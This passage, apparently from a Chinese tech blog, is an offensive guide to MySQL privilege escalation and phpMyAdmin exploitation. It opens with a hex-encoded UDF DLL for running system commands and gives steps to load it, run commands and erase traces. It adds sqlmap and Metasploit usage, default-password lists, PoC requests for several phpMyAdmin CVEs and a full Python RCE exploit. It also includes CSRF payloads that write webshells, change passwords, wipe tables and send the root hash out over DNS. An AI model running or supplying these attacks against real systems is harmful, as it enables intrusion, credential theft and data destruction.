F8B3CCB5C4CBF9D3D0C4A3BFE90D0A7073202D6B70207069640920B9D8B1D5D2BBB8F6BDF8B3CC0D0A7073202D6B6E206E616D650920B9D8B1D5CBF9D3D0D6B8B6A8B5C4BDF8B3CCC3FB0D0A0000002573093C3078252E38583E0D0A0000004D6F64756C65506174680942617365416464726573730D0A0000000025640925735C25730925730D0A000000456E756D50726F6365737365732829206572726F722E0D0A000000005365446562756750726976696C656765000000007073202D6B6E206E616D650D0A7073202D6B70207069640D0A0000007073202D6D73206E616D650D0A7073202D6D70207069640D0A00000052746C41646A75737450726976696C65676500005A7753687574646F776E53797374656D000000004E54444C4C2E444C4C0000004661696C656420546F2053687574646F776E00004661696C656420546F205265626F6F74000000004661696C656420546F204C6F676F66660000000049732054616B696E6720506C6163652E2E2E2E2E2E0D0A00536553687574646F776E50726976696C656765000000000055534147453A0D0A20202020202073687574646F776E205B202D30313233345D0D0A2020202020202D30202020206C6F676F66662E0D0A2020202020202D31202020207265626F6F742E0D0A2020202020202D3220202020706F7765726F66662E0D0A2020202020202D33202020207375706572207265626F6F742E0D0A2020202020202D342020202073757065722073687574646F776E2E0D0A6578616D706C653A0D0A20202020202073687574646F776E202D330D0A0000000077696E7374612E646C6C000057696E53746174696F6E5265736574005554494C444C4C2E646C6C00537472436F6E6E656374537461746500252D3131642020252D3133732020252D3133732020252D3133732020252D313573202025730D0A00202020200000000025642E25642E25642E25640053657373696F6E49442020202053657373696F6E4E616D6520202020557365724E616D6520202020202020436C69656E744E616D6520202020202020495020202020202020202020202020202053746174650D0A00000000456E756D6572617465205465726D696E616C2053657373696F6E73204661696C65642E2025640D0A000000004661696C20546F20536574204E6577205465726D696E616C205365727669636520506F72740D0A00546865205465726D696E616C205365727669636520506F727420486173204265656E2053657420546F2025640D0A00000000000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D54637000000000506F72744E756D62657200006644656E795453436F6E6E656374696F6E73000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C20536572766572000000005453456E61626C656400000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D5365727669636500000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D44440000000053746172740000005465726D696E616C2053657276696365205374617475733A2025730D0A00000044697361626C656400000000456E61626C6564005265674F70656E4B65794578204572726F722E0D0A0000005465726D696E616C205365727669636520506F72743A2025640D0A00536574204E6577205465726D696E616C2053657276696365204661696C65640D0A000000536574205465726D696E616C20536572766963652044697361626C65640D0A00536574205465726D696E616C205365727669636520456E61626C65642E0D0A006C6F676F666600007175657279000000766965770000000064697361626C6500656E61626C65000070000000000000004445534352495054494F4E3A0D0A202020202020202020202020436F6E666967205465726D696E616C205365727669636520537570706F72747320323030302F78702F323030332E0D0A55534147453A0D0A2020202020207465726D737663202D656E61626C65202D64697361626C65202D76696577202D70203C6E6577706F72743E202D7175657279202D6C6F676F6666203C73657373696F6E2069643E0D0A2020202020202D656E61626C6520202020456E61626C65205465726D696E616C20536572766963652E0D0A2020202020202D64697361626C6520202044697361626C65205465726D696E616C20536572766963652E0D0A2020202020202D7669657720202020202056696577205465726D696E616C20536572766963652053657474696E67732E0D0A2020202020202D70202020202020202020536574204E6577205465726D696E616C205365727669636520506F72742E0D0A6578616D706C653A0D0A2020202020207465726D737663202D71756572790D0A2020202020207465726D737663202D6C6F676F666620310D0A2020202020207465726D737663202D656E61626C65202D7020333339390D0A2020202020207465726D737663202D7020333339390D0A2020202020207465726D737663202D766965770D0A0099210010D1210010E22100100C2200100000000000000000C000000000000046762F0010762F0010762F0010F7230010D5240010F723001099210010D1210010E22100102D2400102E4F4350000000000D0A68656C700D0A436D6420202020202020202D3E0D0A45786563202020202020202D3E0D0A53687574646F776E2020203D3E0D0A70732020202020202020203D3E0D0A5465726D537663202020203D3E0D0A0D0A000000556E6B6E6F776E20436F6D6D616E642E3A28200D0A0D0A005465726D537663007073000073687574646F776E000000004578656300000000436D6400455F4F55544F464D454D4F52590000003F00000068656C7000000000FFFFFFFFFA3000102005931901000000804A0010000000000000000000000000000000008C4B00000000000000000000E24E000034400000844C00000000000000000000004F00002C410000584B00000000000000000000EE4F0000004000009C4C000000000000000000000E50000044410000104C000000000000000000004C500000B84000001C4C000000000000000000002E510000C4400000704C00000000000000000000AA510000184100008C4C00000000000000000000FA510000344100000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000071025365744C6173744572726F7200009E025465726D696E61746550726F6365737300001B00436C6F736548616E646C65001A014765744C6173744572726F7200009602536C65657000DF02577269746546696C6500CE0257616974466F7253696E676C654F626A6563740018025265616446696C650000F9015065656B4E616D65645069706500440043726561746550726F63657373410000500147657453746172747570496E666F41004300437265617465506970650000F70047657443757272656E7450726F63657373006D014765745469636B436F756E740000EF014F70656E50726F63657373003E0147657450726F63416464726573730000C2014C6F61644C696272617279410000D2025769646543686172546F4D756C74694279746500B001496E7465726C6F636B6564496E6372656D656E740000AD01496E7465726C6F636B656444656372656D656E740000D6014D6170566965774F6646696C6500350043726561746546696C654D617070696E67410000B002556E6D6170566965774F6646696C6500120147657446696C6553697A6500570044656C65746546696C654100340043726561746546696C654100630147657454656D7046696C654E616D65410000650147657454656D7050617468410000550044656C657465437269746963616C53656374696F6E00C1014C65617665437269746963616C53656374696F6E00006600456E746572437269746963616C53656374696F6E0000AA01496E697469616C697A65437269746963616C53656374696F6E004B45524E454C33322E646C6C0000D3004578697457696E646F77734578005553455233322E646C6C0000170041646A757374546F6B656E50726976696C6567657300F5004C6F6F6B757050726976696C65676556616C7565410042014F70656E50726F63657373546F6B656E0000EF004C6F6F6B75704163636F756E745369644100D000476574546F6B656E496E666F726D6174696F6E005B01526567436C6F73654B6579007B01526567517565727956616C7565457841000072015265674F70656E4B657945784100860152656753657456616C75654578410000640152656744656C65746556616C7565410071015265674F70656E4B657941005E015265674372656174654B6579410041445641504933322E646C6C00002E00436F496E697469616C697A65457800006F6C6533322E646C6C000B013F3F315F4C6F636B697440737464404051414540585A0000A2003F3F305F4C6F636B697440737464404051414540585A00004D5356435036302E646C6C005753325F33322E646C6C00003D0261746F6900005E02667265650000B202737072696E74660091026D616C6C6F63000059015F6D6273636D70005F015F6D627369636D700000BE027374726C656E00000F003F3F3240594150415849405A0000C502737472737472000099026D656D7365740000E6027763736C656E000049005F5F4378784672616D6548616E646C65720096026D656D636D70000092015F7075726563616C6C00AD027365746C6F63616C6500DC0276737072696E74660000BA027374726370790000C1015F73747269636D7000004D53564352542E646C6C00000F015F696E69747465726D009D005F61646A7573745F6664697600000C004765744D6F64756C65426173654E616D654100000E004765744D6F64756C6546696C654E616D6545784100000400456E756D50726F636573734D6F64756C657300000500456E756D50726F6365737365730050534150492E444C4C000800575453467265654D656D6F7279000C00575453517565727953657373696F6E496E666F726D6174696F6E41000600575453456E756D657261746553657373696F6E73410057545341504933322E646C6C000057494E494E45542E646C6C0000000000000000000000000000000000BFC7514B00000000665200000100000003000000030000004852000054520000605200003314000020140000F4130000725200007852000085520000000001000200546573745544462E646C6C007368656C6C007368656C6C5F6465696E6974007368656C6C5F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000D0490010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000140100000F30163039304E305D307330C430F630043110313F3166317C319C31A531BD31F6310F3231323B3242325A327432B332C632D532193336338733A433F833013407340D34293439349634B234C334DB34033510356D357E359D351436CD36D436DC360137373723383238623874389D38B8382B3969398D39AF39E839013A113A403A483A5D3A713A803ACE3ADF3AE53AF33AF83A063B403B503B693B723B823B8B3B9B3BA43BE43B033C123C1B3C203C263C2D3C343C4A3C533C583C5E3C653C6C3CA53CAB3CC43C333D443D683D6F3D7C3D833D9F3DFC3D013E1E3E2C3E4F3E553E803E9E3EA33EC63EEF3EF63E023F203F403F573F603F713F813F8C3F963FBF3FC53FDC3FF63FFF3F000000200000F0000000283051305830653076308E30B230D230E130F53012312C3146315D317231A431DB31EE3116323C32533268328532A832B332BE32D432F43245336D33B633BB33C233C933CF33143456345D34663475349E34A4341935413555358435AE35C335D5350C36473675369336BC36EE368B37B637F0383739E839EE39F639FD39093A123A263A6A3A713A913AD03BD63BDE3BE43BEE3B123C9A3CBA3CF63C3C3D873D953D9E3DB13DD33DDD3D013E1F3E3D3E5B3E7E3E8E3EB83ECD3ED43EF03EF63EFC3E023F423F723F783F7E3F8C3F943F9A3FA53FB23FBA3FC83FCD3FD23FD73FE23FEF3FF93F000000300000280000000E301A30203042305430B030CC30D230D830DE30E430EA30F030F63003310000004000002C00000098318039843988398C39A039A439A839AC39B039B439B839BC39C039C439843A903A0000006000000C00000014300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,CHAR))

写入到文件中
select c from udftmp into dumpfile '路径\\plugin\\udf.dll';
创建自定义函数shell
CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll';
执行命令
select shell('cmd','whoami');#直接是启动mysql用户的权限
image.png
若出现下面报错
1123 - Can’t initialize function ‘shell’; UDFs are unavailable with the --skip-grant-tables option
需要将my.ini中的skip-grant-tables选项注释掉。
清除痕迹

drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell'  删除函数

2.可以通过其他方式想方设法把文件上传到指定目录

可以使用sqlmap直接提权

原理和上面一样,当然条件也和上面一样
命令:

python sqlmap.py -d "mysql://用户:密码@192.168.18.143:3306/mysql" --os-shell

选择系统位数
[22:45:21] [INFO] testing if current user is DBA
[1] 32-bit (default)
[2] 64-bit

命令执行成功
image.png
报错
若显示下面错误,则是缺少模块导致,musqldb模块python3无法直接下载

 [CRITICAL] SQLAlchemy connection issue ('ModuleNotFoundError: No module named 'MySQLdb'')

访问下面链接,下载模块,进行本地安装
https://pypi.org/project/mysqlclient/#files
image.png
cp39代表:python3.9的版本
下载后在相应目录下执行
pip install mysqlclient-2.1.0-cp39-cp39-win_amd64.whl

msf提权

udf提权

msfconsole
use exploit/windows/mysql/mysql_payload
options
set rhost 192.168.2.1
set rport 3306
set username root
set password 123456
run 0或者exploit

msf启动项提权

use exploit/windows/mysql/mysql_start_up
set rhost 192.168.2.1
set rport 3306
set username root
set password 123456
run

还有其他姿势,推荐文章https://www.cnblogs.com/yzloo/p/10390916.html

三、phpmyadmin漏洞利用

1.phpMyAdmin版本判断:

image.png
image.png

也可以直接访问:/doc/html/index.html目录

2.phpMyAdmin利用:

phpMyAdmin的漏洞多为经过验证后的才能利用,所以需要进入后台,可以采用爆破的方式进入后台,常用的有:

root:root  
root:(space) 
mysql:mysql
root:123456

2.1 WooYun-2016-1994 33:任意文件读取漏洞

影响范围:phpMyAdmin 2.x版本,
poc如下:

POST /scripts/setup.php HTTP/1.1 
Host: your-ip:8080
Accept-Encoding: gzip, deflate Accept: */*
Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trid ent/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded 
Content-Length: 80


action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

2.2. CVE-2014 -8959:本地文件包含

影响范围:
phpMyAdmin 4 .0.1–4 .2.12,需要PHP version < 5.3.4
Poc如下:

/gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]= /../../../../phpinfo.txt%00    # 注意改下token值

在实际利用中可以利用写入文件到/tmp目录下结合此漏洞完成RCE,php版本可以通过http header、导出表内容到文件的附加内容看到。

3. CVE-2016-5734 :后台命令执行RCE

影响范围:

phpMyAdmin version
	4.0.10.16 之前的4.0.x版本
	4.4.15.7 之前的 4.4.x版本
	4.6.3之前的 4.6.x版本

PHP version
	4.3.0~5.4.6
Php 5.0 版本以上的将 preg_replace 的 /e修饰符给废弃掉了

工具源码

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""

import requests
import argparse
import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
    arguments = parser.parse_args()
    url_to_pma = arguments.url
    uname = arguments.user
    upass = arguments.pwd
    if arguments.dbs:
        db = arguments.dbs
    else:
        db = "test"
    token = False
    custom_table = False
    if arguments.table:
        custom_table = True
        table = arguments.table
    else:
        table = "prgpwn"
    if arguments.cmd:
        payload = arguments.cmd
    else:
        payload = "system('uname -a');"

    size = 32
    s = requests.Session()
    # you can manually add proxy support it's very simple ;)
    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
    s.verify = False
    sql = '''CREATE TABLE `{0}` (
      `first` varchar(10) CHARACTER SET utf8 NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
    INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
    '''.format(table)

    # get_token
    resp = s.post(url_to_pma + "/?lang=en", dict(
        pma_username=uname,
        pma_password=upass
    ))
    if resp.status_code is 200:
        token_place = resp.text.find("token=") + 6
        token = resp.text[token_place:token_place + 32]
    if token is False:
        print("Cannot get valid authorization token.")
        sys.exit(1)

    if custom_table is False:
        data = {
            "is_js_confirmed": "0",
            "db": db,
            "token": token,
            "pos": "0",
            "sql_query": sql,
            "sql_delimiter": ";",
            "show_query": "0",
            "fk_checks": "0",
            "SQL": "Go",
            "ajax_request": "true",
            "ajax_page_request": "true",
        }
        resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
        if resp.status_code == 200:
            if "success" in resp.json():
                if resp.json()["success"] is False:
                    first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]
                    error = first[:first.find("</code>")]
                    if "already exists" in error:
                        print(error)
                    else:
                        print("ERROR: " + error)
                        sys.exit(1)
    # build exploit
    exploit = {
        "db": db,
        "table": table,
        "token": token,
        "goto": "sql.php",
        "find": "0/e\0",
        "replaceWith": payload,
        "columnIndex": "0",
        "useRegex": "on",
        "submit": "Go",
        "ajax_request": "true"
    }
    resp = s.post(
        url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
    )
    if resp.status_code == 200:
        result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]
        if len(result):
            print("result: " + result)
            sys.exit(0)
        print(
            "Exploit failed!\n"
            "Try to manually set exploit parameters like --table, --database and --token.\n"
            "Remember that servers with PHP version greater than 5.4.6"
            " is not exploitable, because of warning about null byte in regexp"
        )
        sys.exit(1)

利用如下:

cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"

2.4 .CVE-2018-12613:后台文件包含

影响范围:
phpMyAdmin 4 .8.0和4 .8.1
经过验证可实现任意文件包含。利用如下:
(1)执行SQL语句,将PHP代码写入Session文件中:
select ‘<?php phpinfo();exit;?>’
(2)包含session文件:

http://10.1.1.10/index.php?target=db_sql.php%253f/../../../../../../../../var/l ib/php/sessions/sess_***      # *** 为phpMyAdmin的COOKIE值

2.5. CVE-2018-19968:任意文件包含/RCE

影响范围:
phpMyAdmin 4.8.0~4.8.3

利用如下:
(1)创建数据库,并将PHP代码写入Session文件中

CREATE DATABASE foo; CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY ); INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';

(2)生成foo数据库的phpMyAdmin的配置表,访问:
http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo
(3)篡改数据插入pma column_info中:

INSERT INTO` pma__column_infoSELECT '1', 'foo', 'bar', 'baz', 'plop','plop', ' plop', 'plop','../../../../../../../../tmp/sess_***','plop'; # *** 为phpMyAdmin 的COOKIE值

这里要注意不用系统的session保存位置不同,具体系统可以在phpMyAdmin登录后首页看到
MacOS:
/var/tmp
Linux:
/var/lib/php/sessions
phpStudy:
/phpstudy/PHPTutorial/tmp/tmp
(4)访问包含Session文件的地址:

http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[ multi_edit][][]=baz&clause_is_unique=1

2.6 CVE-2020-0554:后台SQL注入

影响范围:

phpMyAdmin 4< 4.9.4 	phpMyAdmin 5< 5.0.1 	前提:已知一个用户名密码

简单总结流程:
页面位置server_privileges.php;
设置变量ajax_requests为true;
设置变量validate_username 为真值;
设置变量username 为我们拼接的注入语句。
构造payload:

http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

(token和其余参数会在访问页面的时候自动提供)
我们查看后端收到的数据,可以看到SQL已经成功拼接。
image.png
执行完毕后程序只会告知SQL是否执行成功,失败会报错,因此此处我们可以利用报错注入。
构造payload:

http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

结果如下,可以看到已经成功执行了我们注入的指令。
image.png

2.7 CVE-2019-12922 跨站请求伪造

影响范围:
phpMyAdmin version <= 4.9.0.1
利用如下:
在登录状态下,添加一个服务器
image.png
http://192.168.123.65/phpmyadmin/setup/index.php
image.png
image.png
点击删除时,通过工具抓包
image.png
参数id对应的是第几个服务器。构造恶意链接。
当然实战中的链接怎么吸引人让目标去点击还得靠自己去构造。
image.png
页面显示404,但img的src会去请求一次。此时创建了两个服务器
image.png
点击我们构造的恶意链接时,显示刚才构造的页面结果
image.png
此时再去查看服务器
image.png
已经被删除,攻击成功。
CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站请求伪造漏洞复现

2.8 CVE-2017-1000499 跨站请求伪造

影响范围:

Phpmyadmin:4.7.6   
Phpmyadmin:4.7.0:Beta1   	
Phpmyadmin:4.7.0:Rc1   	
Phpmyadmin:4.7.5   	
Phpmyadmin:4.7.4

POC如下:

# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Date: 2018-08-28
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499

# Exploit CSRF - Modifying the password of current user

<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />

# Exploit CSRF - Arbitrary File Write

<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select
'<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
style="display:none;" />

# Exploit CSRF - Data Retrieval over DNS

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
user='root' LIMIT 1),'.vulnspy.com\\test'));

# Exploit CSRF - Empty All Rows From All Tables

<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
style="display:none;" />

CVE-2017-1000499

3.特定版本GetShell

3.1 CVE-2013-3238

影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模块:exploit/multi/http/phpmyadminpregreplace

3.2 CVE-2012-5159

影响版本:phpMyAdmin v3.5.2.2
利用模块:exploit/multi/http/phpmyadmin3522_backdoor

3.3 CVE-2009-1151

PhpMyAdmin配置文件/config/config.inc.php存在命令执行
影响版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
利用模块:exploit/unix/webapp/phpmyadmin_config

3.4 弱口令&万能密码

弱口令:版本phpmyadmin2.11.9.2, 直接root用户登陆,无需密码
万能密码:版本2.11.3 / 2.11.4,用户名’localhost’@'@"则登录成功
phpMyAdmin版本漏洞转自文章:https://www.cnblogs.com/liliyuanshangcao/p/13815242.html

虚无-缥缈
关注
  • 4
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
自动化部署 MySQL Shell脚本
01-04
自动化部署 MySQL Shell脚本
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码)
07-30
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码)
关于MySQL的几种getshell
NYG694的博客
02-01 801
场景介绍:当靶机拥有连接数据库功能时,我们在自己服务器上开启数据库服务,下载脚本用python2运行至于读取什么文件就更改filelist就可以了。
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
mysql备份shell脚本
06-10
mysql备份支持全量、日志备份
Centos7安装 mysql5.6.29 shell脚本
09-09
主要为大家详细介绍了Centos7安装mysql5.6.29的shell脚本,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4571
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
Mysql数据库getshell方法
weixin_68408599的博客
04-02 930
今天摸鱼时候,突然有人问我不同的数据库getshell的方式,一时间我想到了mysql还有redis未授权访问到getshell的方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell的方式。因此更新一个专栏,各个数据库getshell的方式。
mysql中getshell的方式
unexpectedthing的博客
03-17 4393
文章目录outfile和dumpfile写shell利用条件基于union联合查询:非联合查询outfile和dumpfile的区别secure_file_prive日志getshell慢日志getshell利用general_logbinlog的介绍 outfile和dumpfile写shell 利用条件 数据库当前用户为root权限; 知道当前网站的绝对路径; PHP的GPC为 off状态;(魔术引号,GET,POST,Cookie) 写入的那个路径存在写入权限。 基于union联合查询: ?i
mysql怎么getshell_phpMyAdmin新姿势getshell
weixin_35249165的博客
02-02 466
0x00 设想假设我们拥有MySQL的root权限,登录Web端的phpMyAdmin数据库管理控制台,你有多少种方法去getshell?本文旨在研究新的方法,如果在INTO OUTFILE禁用的情况下,或许会少很多思路了。这里的禁用是完全(权限)禁用,而不是拦截行为。0x01 常规方法测试好了,入正题,我目前拥有一台WIN XP虚拟机,上面的服务如下:Apache 2.4.23(此环境与本文实现...
mysql连接shell
10-12
mysqlshell命令导出数据,执行存储过程
mysql-shell
最新发布
04-04
用来搭建集群的
mysql能知道web路径吗_Mysql与web之间的数据、查询等个问题
weixin_32307599的博客
01-19 391
Mysql与web之间的数据、查询等个问题在自己写的一个jsp主页连接数据库出现的各种问题,写记下来与大家分享,共勉。最后附jdbc代码。---DanlVError1---错误代码:javax.servlet.ServletException com.microsoft.sqlserver.jdbc.SQLServerException 索引 1 超出范围问题描述:是由于 sql语句中的?是中文,...
mysql语句进阶
weixin_45308292的博客
12-27 635
sql语句进阶 关于基本的sql语句使用,我放在了这篇博客,你们可以参考 我这章只将进阶知识 如果你发现有些命令输入后无法使用,可能是mysql版本过低 使用如下命令,查看mysql的版本 mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.26 | +-----------+ 1 row i...
mysql数据库shell_利用数据库shell的一些姿势
weixin_34569317的博客
01-26 2035
0x01、利用MySQL命令导出getshell利用条件:1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法:通过into outfile 进行文件写入,写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...
MySql注入到GetShell
Williamanddog的博客
01-17 519
mysql数据库中存在mysql select into outfile命令,该命令的作用是将被选择的一行写入一个文件。(2)要有mysql file权限(即能否对系统的文件读取和写操作),默认情况下只有root权限有。在配置文件中,我们可以看到数据库的用户名为root,密码为p@ssw0rd。(3)对目录要有写权限,一般image之类的存放图片的目录有写权限。还要注意:写的文件名一定是在网站中不存在的,不然会失败。然后我们通过蚁剑的数据连接就可以进入数据库。然后我们进入config目录查看配置文件。
利用数据库提权参考方法
bobo_milk的博客
11-26 1356
数据库提权方法
SQL注入一句话木马(load_file/out file)
初学者L_言的博客
11-26 8440
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
mysql+shell
10-27
MySQL是一种关系型数据库管理系统,它使用SQL语言进行数据管理。而Shell是一种命令行解释器,可以用于执行各种操作系统命令和脚本。在MySQL中,可以使用Shell命令来执行一些系统级别的操作,例如查看当前时间、查看当前目录、执行系统命令等。同时,也可以使用Shell脚本来编写一些自动化的任务,例如备份数据库、定时执行SQL语句等。通过结合MySQLShell,可以实现更加高效和自动化的数据管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚无-缥缈

